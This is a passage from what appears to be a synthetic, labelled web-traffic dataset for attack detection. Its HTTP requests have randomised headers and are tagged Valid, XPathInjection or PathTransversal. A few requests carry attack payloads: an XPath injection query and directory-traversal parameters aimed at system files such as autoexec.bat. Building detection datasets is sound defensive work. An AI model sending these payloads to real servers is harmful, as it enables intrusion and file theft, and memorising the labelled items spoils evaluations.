UA-Pixels: 4730x760
Via: 8.8 www.eltl4n62.jpeg, 8.1 www.rsa1a.gif:282, 6.5 www.reoai.htm
Transfer-Encoding: deflate
Upgrade: gh9st/0.8
Warning: 229 www.n61e.shtml "wbSpiker" 
X-Forwarded-For: 170.97.95.101
X-Serial-Number: 93545623104
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26277
Start - Id: 35715
class: XPathInjection
GET /tVzL.p/fpmeddemhgeipft/eaeire/k-S-9CXo2zg6/i4reyrsfevwoIhjrso/yp9L-a0.gif?pnmr=o2AQz1d3nyM&rls=5&s5=402469&Oughn=nt6tbSrbct1servicese&ayyT=leaiohu%26php&ugfAudArj=eJuaiadetustii&drsIol=27&zoeors9sabt=4897+++or+++Grh%2FdRkjm%2FTf%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D982%5D+or++++155%3D HTTP/1.1
Host: www.tnhi9hg.be
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-2022-kr;q=0.7, windows-1250;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 77.125.12.174
Cookie: suctdehsisY=9o= 
Cookie2: $Version="9"
Date: Mon, 13 Apr 09 01:38:11 UTC
ETag: W/"mZF-ns0Ok3629vIwy"
Expect: 100-continue
From: p1tia@Pqapltwu.it
If-Modified-Since: Sat, 09 Aug 08 12:20:43 CET
If-Unmodified-Since: Sat, 18 Apr 09 09:39:41 CET
If-Match: "oVDr5C2uImBrOue"
If-None-Match: "6T.17L64ixue@dU4Tud"
If-Range: Wed, 25 Jul 07 08:05:44 GMT
Max-Forwards: 625
MIME-Version: 8.0
Pragma: noDSneiR=en
Proxy-Authorization: Basic ZXllYTc6dHNuMA==
Authorization: Digest nonce
Range: 5225-,8-9,1-
Referer: /Oade/wIgDwfc/Eotrfapa/iEicj/amtila51.sh
TE: trailers,deflate
Trailer: TE
User-Agent: mo8PoQ http://www.ierg.cz
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x6887
Via: HTTP/5.9 www.0rwrNh.jpg:7, yude/2.0 10.38.47.102:78
Transfer-Encoding: compress
Upgrade: d3ec/2.6, tifat/9.6
Warning: 793 32.218.57.169 "eazenA2aeien9eE9jtir" "Sun, 17 Jan 10 06:57:02 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35715
Start - Id: 44764
class: PathTransversal
GET /t8uuv6e.mdb?KNne=88&oo1bSmee5kc=d%27riincludefwyarrmot&5eruE0ec=wPQIsJamSyS&spotravn=betweeniArwcd&6TEcaW=alQreaIF3nAF&FkseapOx8isOt9=Dn%2BRn7a%3B1&J-HservicesFGAnph-L=fapcul&sn9t=8f%29&uta=799903216&tiwsu4eyTst7au=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&tnhdsnezeeat=eo8+&@pHid.=scriptne&sRuAi=762254 HTTP/1.1
Host: www.noipAt8t.biz:169
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 245.254.197.131
Cookie: tM4tT=26706
Cookie2: $Version="28"
Date: Sun, 28 Oct 07 06:38:03 UTC
ETag: "Td0bO0Q80mtdsptX"
Expect: ammm
From: Strga@kmekoca.fr
If-Modified-Since: Sat, 27 Dec 08 07:20:09 CET
If-Unmodified-Since: Sun, 12 Feb 06 20:45:36 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Mar 06 18:32:05 GMT
Max-Forwards: 9
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: Digest uri=http://sfdqq.ch/w4oi39b/rt6erG/aaebraw1/ioSfdss.swf
Range: 6578-336232,-258470,45228-5909
Referer: /aseso6cu/pbynl/hueyo.zip
TE: deflate;q=0.0,trailers
Trailer: TE
User-Agent: am_oFoK http://www.sneoZpe.org
UA-CPU: Sparc
UA-Disp: 4597,5625,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 332x3916
Via: 7.1 www.hneoy.tiff
Transfer-Encoding: compress
Upgrade: ene/3.3, dnense/3.4, iDe8je/2.2, ecTeud/6.4, a7yhir/5.9
Warning: 777 www.ehusd6.shtml "Aader5almnIete" "Mon, 11 Feb 08 10:44:13 CET"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 29099
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44764
Start - Id: 17540
class: Valid
GET /5nbbw0wesoo4rj0t/omfeo/tDr8NB-g3E5DjAe/7etrieyv/cGqo5ZyvdPXqw2xbuH_/EtaanNgh4odpnooEs/eATnetcatlibw9/yofe/egaortFraetwu6tcij/uBSLKs.2utAOG/sbzfGVRW_yo1Cgg4XZn.nsf?Fgyimg03lDJtmpA=%29flt&yeeonRicnfhe=368156&ovjtHso=i+Wwec&mn2eaTgaes=806822&oS2wyxtVVcservices9=paneqae&chnetvfpccoii=taobzhontrino&oOs54Oett=sfDncii0t10eE7Nt&uty=kPMLRdSf&hs=hdb6avvnd0Antdc HTTP/1.0
Host: www.eriet7fof.fr:43
Connection: close
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 49.240.156.62
Cookie: nh=hro3erry;wtendtyo2=251123989;7naxehlo=toq@m
Cookie2: $Version="7"
Date: Wed, 14 Apr 04 08:30:31 UTC
ETag: W/"hdzXRzmYIBU_M9P1Xa7"
Expect: nrt9in
From: otDs@riqaOar1o.it
If-Modified-Since: Thu, 07 Jan 10 01:16:04 CET
If-Unmodified-Since: Mon, 22 Dec 08 06:45:57 GMT
If-Match: *
If-None-Match: *
If-Range: "-04AqOI5ft4O8-o4amu3"
Max-Forwards: 42
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: y31i oT4idrMo=estc2ua
Authorization: ljaa qgnt=toaai
Range: -848823,71971-191917
Referer: /hJoe6seo/alocnm6/o1ip.msf
TE: trailers,gzip,deflate
Trailer: Authorization
User-Agent: 2lr84t
UA-CPU: StrongARM
UA-Disp: 586,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 845x6872
Via: 3.1 146.228.168.123
Transfer-Encoding: identity
Upgrade: qnef/6.1, teHndi/9.7, n5GAtw/8.0, Epe/2.3
Warning: 578 www.cuZgchp.tiff "esuto1wenhlasinfem" "Mon, 23 Mar 09 10:21:32 UTC"
X-Forwarded-For: 235.147.93.170
X-Serial-Number: 8998788877117234588
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17540
Start - Id: 30718
class: Valid
GET /tNy_nMiabk9VZJpuh/ik@mRPyVh/et1RiXD/b4Osr2ECZ/KE/4cdzg/n1eevto/I9a0T6qsleodgSAh/p2.png?7tAhiytqDnevjh=https%24f%25a&tGpwirae=734080645&nleden=4&eaz8Ardthrez3n=039372&ebrfp=553&KzJmn0hA=wh%5Dn&JTk7G9s3x3=6&iidiriShatuli=zzinputygeaelo+xp_&m8kN@pl=+++rmo0i%3C&deidwtzjnrE=a.bCpsEvhjkm&Y7Ts1rm1feane=d8rcix&vtTdr6coHi5s=cdeuhGb&hBpT=sapye&v1muaUo=inujesheaeIETt&cAg4=supaTi+nay HTTP/1.1
Host: 84.191.46.83:739
Connection: keep-alive
Accept: audio/basic, text/xml;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.9, compress;q=0.4, gzip;q=0.5
Accept-Language: ot-2i4RE2rm, lh0el-tasuRsa;q=0.6
Cache-Control: only-if-cached
Client-ip: 204.5.251.170
Cookie: 4s7etyg=DLaes jSin; aa:Per;rhe1EguinqOT=LtatI;T3shutdownCE=vbscriptotojlphphtaccesbYqCdd3l letc;ufeoA=048;oeTsOo=s12JN;Iaoriug=81Wsrr566n
Cookie2: $Version="36"
Date: Thu, 20 May 04 03:05:42 GMT
ETag: W/"OxHnriD0suMXtmOn"
Expect: 100-continue
From: dubt@tmrdi.net
If-Modified-Since: Wed, 20 Sep 06 01:19:38 UTC
If-Unmodified-Since: Sat, 26 Jan 08 17:49:09 GMT
If-Match: "6ao.tKS5A-DecRKW8hyN"
If-None-Match: "cKKlW4@wLi7708TeEk1"
If-Range: Mon, 14 Dec 09 21:36:32 GMT
Max-Forwards: 621
MIME-Version: 7.4
Pragma: murwnch=hyeae
Proxy-Authorization: uwea ht18Lnh=tnrantuh
Authorization: Basic TmV0ZWVTc046ZGloc2F0
Range: 17470-
Referer: /gant/tn8ran.css
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: duthosgiawposetstwr
UA-CPU: x86
UA-Disp: 802,001,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2445x5903
Via: FTP/3.1 246.138.91.30
Transfer-Encoding: deflate
Upgrade: Fit/6.5, aensa/6.6
Warning: 028 44.212.149.214:667 "lxogstinibrueodc" "Fri, 09 Apr 04 15:35:57 CET"
X-Forwarded-For: 78.5.245.10
X-Serial-Number: 925559378
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30718
Start - Id: 34086
class: Valid
POST /n5Soaifrtlmwatemt/fzd/kVS3.css? HTTP/1.0
Content-Length: 293
Content-Language: ont
Content-Encoding: compress
Content-Location: /mhoiabhl/R5n2tni/4edwr/tryRx/Eutf.tiff
Content-MD5: aHQ5bmE5Zjczb0VhZTVvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 31 Jul 06 14:36:36 GMT
Last-Modified: Mon, 10 Dec 07 17:49:50 UTC
Host: 231.223.85.148
Connection: keep-alive
Accept: text/*
Accept-Charset: x-mac-hebrew;q=0.6, iso-8859-3;q=0.6, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: eneia-nen, tS-xndosied;q=0.0
Cache-Control: max-age=1481
Client-ip: 14.88.248.198
Cookie: YIandLfQZk_t=sa;OtrkhAZwtdvwN=ceOaktxuibsea5in;asrekoiNyn9To=or;thyi=n8CWu9uxRc;m2VWb=3759
Cookie2: $Version="88"
Date: Fri, 26 Jun 09 13:05:23 GMT
ETag: "GivVCcOUMWjjbg8yDImM"
Expect: 100-continue
From: 2s3rpd@N8dboRb.biz
If-Modified-Since: Sat, 09 Jul 05 04:38:03 GMT
If-Unmodified-Since: Sat, 30 Jun 07 08:51:45 CET
If-Match: "lPObnr8Vz90qDEOA8io"
If-None-Match: "8EObg29Jv7lpJjDek"
If-Range: "zpUw2nm55HFspUn"
Max-Forwards: 360
MIME-Version: 9.8
Pragma: yb='ite2il'
Proxy-Authorization: NTLM OWxvcmZmaGJxYm9yYWF3d3lvQTR0ZmVwYW1hNm1rcHl0dmFlaHJ3YmlsY3luc212
Authorization: Digest opaque="i0nienr"
Range: 0159-
Referer: http://www.jIasfu.net/Ooepjet/ynotte/esa8adhe/u3xfudc.jpg
TE: trailers,deflate;q=0.2
Trailer: Accept-Charset
User-Agent: tsTitt4ge/7.2.8.3
UA-CPU: x86
UA-Disp: 654,4575,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 7731x678
Via: 3.9 www.9inEs.css:5281, HTTP/1.1 199.30.105.136, 3.2 www.eas6Nf.tiff:3696
Transfer-Encoding: compress
Upgrade: rl7oi/4.1, tfeG/2.3, Est/0.8, rs7t/5.9
Warning: 657 www.eWibEanz.tiff "iaEat" "Mon, 06 Jul 09 07:37:50 GMT"
X-Forwarded-For: 37.174.184.200
X-Serial-Number: 155066
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ieR5iet=hm1sMoR&sirfsyo=Otu4weasee&pomelig=rm9eslssdri&gwu=rnTJ&ti=co z&CNro4octTab=3pmshethltMT&5buUnvnw3=et3TpreaPW&raTd8hdn9=horb&n40Efvtwwtl1wad=771&deehODoeueg=ndniijoixmeneies&resbe29=tand4s&yoaerlSf=piitipAmloonSmfl&wfHeNe=ASEgic&a50eri3teeOss=uorrP?n3raechoe9sl+cq &8Yg0oT=06992441

End - Id: 34086
Start - Id: 8621
class: Valid
GET /swjpaVSr/tbScoEettr6/j8GwSi43KU.5Vryh/had2g3@brgeQp@iWxDq/reiadrUEst6.tiff?raano=633903&doilbbihua=muownnaso&Y5eirnsgdtgozO=l7ajht%3Biaa-wzsm&imbiidkiOfmPlm=76812052&85SWxterm91q4s=numh&sekiu7nLdAh0pye=1015829612&FEreplace3Vaccess_log=3281&elt8tte=lSe&NdQn4GEmzRr=mtmpzpuntm&ntqnq=+t HTTP/1.1
Host: www.uxr10q.org:80
Connection: close
Accept: application/*;q=0.7, image/*;q=0.3, audio/*;q=0.9
Accept-Charset: x-mac-hebrew;q=0.6
Accept-Encoding: compress, identity, identity, compress;q=0.6
Accept-Language: it7td-mnynen5d, th8mhpto-dclstmL, daans4te-Ustiese;q=0.1, e-IgeiEh, n6ifHees-scteotc
Cache-Control: max-age=61
Client-ip: 35.238.213.51
Cookie: rpEct=1e winnta
Cookie2: $Version="36"
Date: Thu, 01 Mar 07 10:49:45 UTC
ETag: W/"fmCAK0jEjmX@7yFOMfRE"
Expect: 100-continue
From: ateut5@tfeeh.uk
If-Modified-Since: Sun, 21 Jun 09 13:43:38 UTC
If-Unmodified-Since: Wed, 24 Jun 09 15:24:35 CET
If-Match: "xVYCw-vC6JRFC8B"
If-None-Match: "i0qvDE-nLuzzZzzqw"
If-Range: Thu, 24 Feb 05 09:45:11 CET
Max-Forwards: 84
MIME-Version: 0.9
Pragma: enLdG=bpe
Proxy-Authorization: Digest response="51d1e171acafe5D1aaf5EF4b7BD78eDA"
Authorization: Digest cnonce="eeinlr"
Range: 1-,565-51430,79330-
Referer: /irslwh.conf
TE: trailers
Trailer: Accept
User-Agent: ctm2 (bE@b_P; oLgMnsO@.; oMWGZMnWTE)
UA-CPU: 68000
UA-Disp: 490,2335,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 500x727
Via: FTP/5.8 www.Smen.jpg, FTP/0.8 157.208.117.30
Transfer-Encoding: identity
Upgrade: oAk/9.7, ylzLli/0.8, hne/4.9
Warning: 294 www.tpriIw.html "evdBEd" 
X-Forwarded-For: 240.127.253.85
X-Serial-Number: 396730650206
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8621
Start - Id: 1373
class: Valid
GET /MVnlwWG3MUNetc34H/hi3eydrsAtUhmsea1yc/jduob/meuhmvDhfmnj7npa/umts4/omp8mAFFf_WbCrot.jpeg?t0oe1e8umy7=aoxt0qincpCeahs&bdhA=dlena HTTP/1.0
Host: 225.237.152.71:80
Connection: hix8heis
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 85.112.24.2
Cookie: erorz8naoa=7rjzTB6h;hIenr=thXKpFY6kE;mnh=9;oe=0ciwNlhxNtb;9Fdlocation=tea1iEre?jeo;dMObrf=9281296933
Cookie2: $Version="75"
Date: Tue, 07 Nov 06 02:51:23 UTC
ETag: W/"NLDDHcD.qj9@50a1FAQw"
Expect: ogja=dvneknhE
From: wi2twwpe@rrmwot4.ch
If-Modified-Since: Fri, 20 May 05 05:12:29 UTC
If-Unmodified-Since: Mon, 19 Jan 09 07:46:00 CET
If-Match: *
If-None-Match: "x_saIgUHbKUSZpFdaiNr"
If-Range: Fri, 27 Apr 07 11:48:38 UTC
Max-Forwards: 831
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic b3Rlb3QwYWk6YWRhbU5v
Authorization: Digest cnonce="ihocn"
Range: 24-
Referer: http://N0uotLmu.net/eAnssi/9lsM/tondhr.txt
TE: gzip,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/4.8 (compatible; bp6eeettLt; Win98; sla6isce0)
UA-CPU: 68000
UA-Disp: 0720,076,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 956x464
Via: FTP/7.8 www.dhfylW.js, FTP/3.2 www.kd9m.shtml, 0.8 27.240.228.50
Transfer-Encoding: compress
Upgrade: xrS/2.3, 8tOrz/8.7, eor/4.3
Warning: 857 www.Snpe.htm "qdO3unnssateraarij" 
X-Forwarded-For: 188.179.244.100
X-Serial-Number: 147844
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1373
Start - Id: 30091
class: Valid
GET /Jmeta6T2RCC1/nt9w.Yk/AeaypOl/9hck5oIhaesaie2l6Di/nhEhvtuasfureneafizp/kG_.HM/8NEtOmejjswadA/ePrndFo-zXjPJ01TF1Cf.html? HTTP/1.0
Host: 52.141.84.47:8973
Connection: frharaa
Accept: video/quicktime;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: O-addyujo, ezHteHU-7d
Cache-Control: min-fresh=83188
Client-ip: 207.197.128.199
Cookie: hsrdyCfle5atag=98;e1vradsR2rifI=581;se=2945853334;nN=r6w2tcres5rlwadtI;7SrUhZgroup byV=eitdtrst
Cookie2: $Version="5"
Date: Sat, 19 May 07 10:35:02 CET
ETag: W/"Ocoimis9INXKn05DKM"
Expect: 100-continue
From: mhodu2@U9yLcoem.st
If-Modified-Since: Sat, 22 Sep 07 13:00:08 CET
If-Unmodified-Since: Tue, 01 Jul 08 13:59:47 GMT
If-Match: "HqhfjY@K4oSuI5UdB7Ev"
If-None-Match: *
If-Range: Sat, 26 Jan 08 08:13:08 UTC
Max-Forwards: 4549
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM dDNhY2RiZWVrZGVvdHlnYW50YWlJMzNpcjFpNnBvZHl4RHJydGJvdGxtNA==
Authorization: eusrb oaUM=teyle
Range: -551
Referer: http://www.Iowhtt.fr/31tdoot/mbefrR5u/Tndo/hr1qets1/amOi.css
TE: gzip
Trailer: Connection
User-Agent: Mozilla/7.4 (X11; U; Linux i386 3.5; ie-vr; rv:2.5.8) Gecko/71751820
UA-CPU: x86
UA-Disp: 978,2584,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 226x0520
Via: 3.7 121.244.135.16
Transfer-Encoding: gzip
Upgrade: AajeA/4.4
Warning: 922 172.195.36.87 "f6tmena1" "Fri, 19 Dec 08 22:12:57 CET"
X-Forwarded-For: 129.252.117.122
X-Serial-Number: 131299472861769232
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30091
Start - Id: 2640
class: Valid
GET /aDC/iepsr3xe5id/ur28wztlubS/O1FUDUyEAdPO/isemvnhmwe25lvea/4-3_XtmpZ50D05Qm@.pl? HTTP/1.0
Host: 118.211.243.186:80
Connection: me8alf
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.0
Accept-Language: 8ieihneg-rnanR;q=0.0, hm8a2tl-ikxg;q=0.1, thE5o-f3qL;q=0.8, ax3tm-rlo;q=0.0, s-oa2mohkn
Cache-Control: no-transform
Client-ip: 39.187.33.197
Cookie: ohwnftJ=object-r/s
Cookie2: $Version="2"
Date: Wed, 07 Dec 05 21:20:31 CET
ETag: "mF9xaNTdjYBgCEcGVr5_"
Expect: eete=ebyt;egeE
From: hcqlau@ypyesaoel.fr
If-Modified-Since: Thu, 01 Oct 09 01:40:03 UTC
If-Unmodified-Since: Tue, 11 May 04 10:19:16 CET
If-Match: "7EXLXkdRCAmF_nQXB5_G"
If-None-Match: "44gJu3m._LXFd2or2c"
If-Range: *
Max-Forwards: 75
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.noelxt.uk/uceliu/partes/cnIjab.mdb
Authorization: Basic dE50aXBsZW46aHRmb3NMb00=
Range: 78017-732
Referer: /ln1smab.php
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.3 (X11; U; Linux i386 7.9; tf-d5; rv:7.4.8) Gecko/81142941
UA-CPU: StrongARM
UA-Disp: 409,1827,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 907x1790
Via: pau/2.5 www.xdtom.jpeg:13
Transfer-Encoding: identity
Upgrade: YMots/9.9, 2loo/9.6, cgTcde/7.3, ltne1/8.2, mro0ot/2.9
Warning: 078 www.szqtvs.css "oi2amserJaitbewq1eCw" 
X-Forwarded-For: 196.188.242.124
X-Serial-Number: 8136074594585
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2640
Start - Id: 8627
class: Valid
GET /8dERkA/ru4eudeSlr0anhrmo6w9/nveneahfawe/djKFUe1/h2MT/e8rqyNhcheoiCBnem5n/ZlibMhttpsutATgD/eKUsJzSdD-Q_dioH/eyP8Bv51GB9/5LiAjCvMbn0/ecswuTXJ0MRA0kDBiL_/nDNd3IlT4r9wxe9VYqA.jpg?a3neabeunilatrh=hA%5D&4astsdoaePrica=Sa1aetndntmt&nrsfhdmuS=Dyh&rsur27isfhiiTa=9956&Roiostaneb=dmrsT3ooa&wd83u=r9C&e3Kgstoie=llea&7kc_7xcD_qd=ejyRbhe&eitso2ohrdts=315978&s6N6HnaReo8t=950127&taiiobhchPfVsh=ewgluEflLy&enhorgieetthii4=doeEoidwut0n1&essvI1aveiTosto=yr9nmsiy320Crnw&nnbo9ei=llFoSx HTTP/1.0
Host: 89.207.251.34
Connection: tyEoc
Accept: video/quicktime
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: eitapein-ra, kreof-mtcUf
Cache-Control: edrooo='rwT'
Client-ip: 216.129.18.48
Cookie: rpEct=1e winnta
Cookie2: $Version="262"
Date: Thu, 03 Dec 09 09:16:22 GMT
ETag: W/"sRTXVWBlWEuHjcEL"
Expect: 100-continue
From: ateut5@tfeeh.uk
If-Modified-Since: Thu, 12 Feb 04 09:07:07 GMT
If-Unmodified-Since: Thu, 16 Dec 04 08:31:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 05 Jun 05 14:33:40 CET
Max-Forwards: 486
MIME-Version: 0.9
Pragma: enLdG=bpe
Proxy-Authorization: Digest response="51d1e171acafe5D1aaf5EF4b7BD78eDA"
Authorization: nmfqaa leole32n=a5whi
Range: 1-,565-51430,79330-
Referer: http://www.it10gio.uk/Bo4uty/Uho7E.asmx
TE: trailers
Trailer: Host
User-Agent: igFLyIwT http://www.ue9Fay.com
UA-CPU: 68000
UA-Disp: 5087,858,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5756x292
Via: 4.7 www.amioel.shtml, 4.0 www.aebcMatc.js, FTP/1.9 137.250.63.40
Transfer-Encoding: leyyf; eFaefu=eode6eh8
Upgrade: oAk/9.7, ylzLli/0.8, hne/4.9
Warning: 978 www.7otT.css "fraauadw2rek0lel5" "Sun, 20 Jul 08 18:39:31 CET"
X-Forwarded-For: 240.127.253.85
X-Serial-Number: 396730650206
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8627
Start - Id: 6641
class: Valid
POST /lo/d1nadss4mtr/iframejOzxscriptixmlstdinM8hPreplace.swf? HTTP/1.0
Content-Length: 249
Content-Language: s,wcaetGei,crd
Content-Encoding: deflate
Content-Location: /nbqf/oasbena/Arin.php
Content-MD5: Yklvbmhzc21haHFjZ0hzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Apr 06 03:57:07 GMT
Last-Modified: Sun, 26 Oct 08 04:50:38 GMT
Host: www.pytgllaa.it
Connection: icnuN
Accept: text/*;q=0.5
Accept-Charset: euc-cn;q=0.1, utf-8;q=0.9, windows-1255;q=0.8, x-mac-greek;q=0.3, iso-8859-2;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 46.201.126.153
Cookie: eeD5rooytac=foRsmugcpTr;tc=ypotElca2jEhq3tsa;nsdtyhe=cmde a[dselectiframeaieashep;rTMtbmdio=cpninwe;eWQSFEigW=1026;eetaco=nf6wea
Cookie2: $Version="584"
Date: Sun, 18 Dec 05 21:30:51 GMT
ETag: "1xfFMOhVK2.pnM_RnCs"
Expect: 100-continue
From: bdiim@E4ea.org
If-Modified-Since: Tue, 26 Oct 04 12:56:32 CET
If-Unmodified-Since: Wed, 20 Apr 05 05:47:29 CET
If-Match: "tdpELYoIyc8a84S"
If-None-Match: *
If-Range: Fri, 29 Jan 10 04:58:35 UTC
Max-Forwards: 69
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: NTLM cnp1Z3NpYXNmYlVvZWhvZWN0am5zYnZyckR0ZVpod2x0dHM=
Authorization: NTLM NW9mdDN0dWluaXZxdDdtNmF0dGRsdzd1bmVldGVhaG5odHNyaTU=
Range: -08,-241,7-856
Referer: /jasCfin.asmx
TE: deflate;q=0.6
Trailer: Pragma
User-Agent: Mozilla/2.2 (Windows; U; Windows NT 1.0; eT-ci; rv:3.0.7) Gecko/34340322
UA-CPU: MIPS
UA-Disp: 7646,961,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 792x1593
Via: 5.8 www.estv5ge.htm, 6.7 www.husaand.html:694
Transfer-Encoding: gzip
Upgrade: zfoa/4.4, me8e/8.0, eH5/5.3
Warning: 107 www.Hiehri.js "eswanigari" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

cnbge22nn=3844765709&ThesTpleaoa4nhi=63792&FpasswdU-Vv3qd=4778312&emn=o8K&99atje=6'xforme&suni= ivet&setseewx=0aarplssoaln&4dla=gpbvCxNsshasuRhn&iRerHfgiuq=n_LvyAdwOi9&9tsuatwoyiiaeu=0rc +>v)dth35Tt&1neo=[dtsn%n4e1<o&06CQjbb=utmaatbesi

End - Id: 6641
Start - Id: 36023
class: PathTransversal
GET /al6hottvilanuu/0Z6h2F7SqW8HpL/eqM.bkt6/Cstylezmeta/fgASWM.fR-Af@dC/gn-0dnZk8x/tehlehthi2Eifuedosuu.php4?Lnhaanpruip=%3Ff&hF2og=hformrri&lckzt54=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat HTTP/1.1
Host: www.koHt.fr:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, compress;q=0.4, identity;q=0.5
Accept-Language: oacs1n-ftllwTa;q=0.2, ca3sgon4-ntw;q=0.6, f-aalRvyE, aYAr-muoer4m
Cache-Control: no-transform
Client-ip: 55.18.97.213
Cookie: Ed2ses=142;t8Ovtt1enenaat=wtSohd;ls9daovesatcMAe=en i;dneesiei067=tQbm
Cookie2: $Version="5"
Date: Sat, 07 May 05 09:55:53 UTC
ETag: "1a58EMborIstQSXjUbu@"
Expect: 100-continue
From: e1ea@teeopdrn.uk
If-Modified-Since: Thu, 01 Sep 05 06:17:47 CET
If-Unmodified-Since: Wed, 03 Aug 05 16:08:54 GMT
If-Match: *
If-None-Match: *
If-Range: "VXH3euDX1VSxUnsYb"
Max-Forwards: 38
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: NTLM bmFiRXRsbmlnZXplYWxzTml1bWVlYWVyYWFzdHNkZDh4YTE0bmo=
Authorization: Digest opaque="ek3w"
Range: -05066,-92,-024075
Referer: /isihgh.msf
TE: chunked;q=0.5
Trailer: Host
User-Agent: Mozilla/1.5 (Windows; U; Win 9x 7.3; oT-r6; rv:9.6.8) Gecko/40995944
UA-Disp: 097,2396,8
UA-Color: color8
Via: FTP/9.2 www.jceHisw.css, FTP/3.6 254.83.113.103:50010
Transfer-Encoding: eeef
Upgrade: vki/8.2, ltp2/4.4, eeft/1.6
Warning: 366 209.231.92.237 "1njhsgaZmEo" "Fri, 29 Feb 08 20:21:14 CET"
X-Serial-Number: 83480
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36023
Start - Id: 4199
class: Valid
POST /Ezjo/LUgmfzotrhe0tz/hBo53Pf6_H8Y/eYsmeentrmltihl/0fWjAxbSgRi1C@4/hW7pfKHfCjQxn/ebSu0M@9d/dkemrtunmnyl.gif? HTTP/1.1
Content-Length: 103
Content-Language: fs6pnpad,3s,riihsTlt
Content-Encoding: gzip
Content-Location: /Lfrt.txt
Content-MD5: OGk5cmRscG5lMkxpbzBldA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Jul 08 09:03:40 CET
Last-Modified: Thu, 03 Jul 08 11:57:13 CET
Host: www.aieegui.de
Connection: 0x1t
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: lns-dg0;q=0.7, iechjlb-R
Cache-Control: min-fresh=6
Client-ip: 235.95.46.203
Cookie: aeo=lH8luu2nIbri;ec5=227941;hioEvreceCarp8=rmXdlfu.lq;nawnItfar=44164;a3meirn9=947
Cookie2: $Version="9"
Date: Mon, 03 Apr 06 11:07:32 UTC
ETag: "2uSytG3cdgzdN3v_QSQ"
Expect: hdsT1t8e=UiimS
From: tewe@gFoteninnd.com
If-Modified-Since: Wed, 27 May 09 13:41:24 CET
If-Unmodified-Since: Tue, 17 Feb 09 20:39:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 7.9
Pragma: 9ylw8a='pees8aa'
Proxy-Authorization: Basic aGFFbjE6OWVleGZzVQ==
Authorization: Digest cnonce="NeetTOt"
Range: 2-,878-,561480-5
Referer: /nfrC/hraey/oohanmey.js
TE: trailers,trailers
